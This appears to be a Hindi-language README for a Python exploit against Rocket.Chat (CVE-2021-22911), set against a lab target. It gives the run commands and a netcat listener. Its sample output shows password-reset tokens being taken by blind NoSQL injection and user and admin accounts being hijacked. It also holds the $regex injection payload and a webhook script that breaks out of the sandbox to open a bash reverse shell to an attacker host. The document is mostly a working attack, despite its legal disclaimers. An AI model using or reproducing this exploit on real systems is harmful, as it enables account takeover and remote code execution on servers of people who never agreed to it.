
CVE-2021-22911 Rocket.Chat NoSQL Injection RCE Exploit - शैक्षणिक उद्देश्य
यह एक्सप्लॉइट केवल अधिकृत पैठ परीक्षण (penetration testing) और शैक्षणिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
CVE-2021-22911 Rocket.Chat में एक गंभीर अनधिकृत NoSQL इंजेक्शन भेद्यता है जो रिमोट कोड निष्पादन (RCE) की ओर ले जाती है।
यह एक्सप्लॉइट तीन NoSQL इंजेक्शन हमलों को जोड़ता है:
$regex ऑपरेटर के साथ ब्लाइंड NoSQL इंजेक्शन का उपयोग करता हैchild_process.exec() का उपयोग करता हैpip install requests
nc -lvnp 4444
मैन्युअल IP प्रविष्टि:
python3 rocket_chat_exploit.py \
-u [email protected] \
-a [email protected] \
-t http://chat.rocket.thm \
-i 10.9.0.1 \
-p 4444
tun0 IP स्वतः-पहचानें (अनुशंसित):
python3 rocket_chat_exploit.py \
-u [email protected] \
-a [email protected] \
-t http://chat.rocket.thm \
-i $(ip a show tun0 | grep "inet " | awk '{print $2}' | cut -d/ -f1) \
-p 4444
तर्क (Arguments):
-u: निम्न-विशेषाधिकार उपयोगकर्ता ईमेल (मौजूद होना चाहिए)-a: एडमिन ईमेल-t: लक्ष्य URL (Rocket.Chat इंस्टेंस)-i: आपका हमलावर IP (tun0)-p: Netcat लिसनर पोर्ट============================================================
Rocket.Chat CVE-2021-22911 — RCE
Target : http://chat.rocket.thm
Shell : 10.9.0.1:4444
============================================================
[PHASE 1] Low-priv user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
[43/43] aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Token: aBcDeFgHiJkLmNoPqRsTuVwXyZ1234567890abcd
[+] Password changed to: P@$$w0rd!1234
[PHASE 2] Admin user → [email protected]
[+] Password reset email sent → [email protected]
[*] Extracting reset token via blind NoSQL injection...
[43/43] XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Token: XyZ9876543210aBcDeFgHiJkLmNoPqRsTuVwXyZ
[+] Password changed to: P@$$w0rd!1234
[PHASE 3] RCE
[!] Start your listener now: nc -lvnp 4444
[*] Press Enter when nc is ready...
[+] Authenticated as [email protected]
userid : userid123456789
token : token123456...
[+] Webhook created
http://chat.rocket.thm/hooks/hookid123/token456
[*] Triggering reverse shell...
[+] Trigger sent — check your nc listener
{
"message": {
"msg": "method",
"method": "getPasswordPolicy",
"params": [
{
"token": {
"$regex": "^abc"
}
}
]
}
}
class Script {
process_incoming_request({ request }) {
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"');
}
}
यह उपकरण केवल शैक्षणिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA) और समान अंतर्राष्ट्रीय कानूनों के तहत एक आपराधिक अपराध है।
जिम्मेदारी से उपयोग करें। केवल उन्हीं सिस्टम का परीक्षण करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।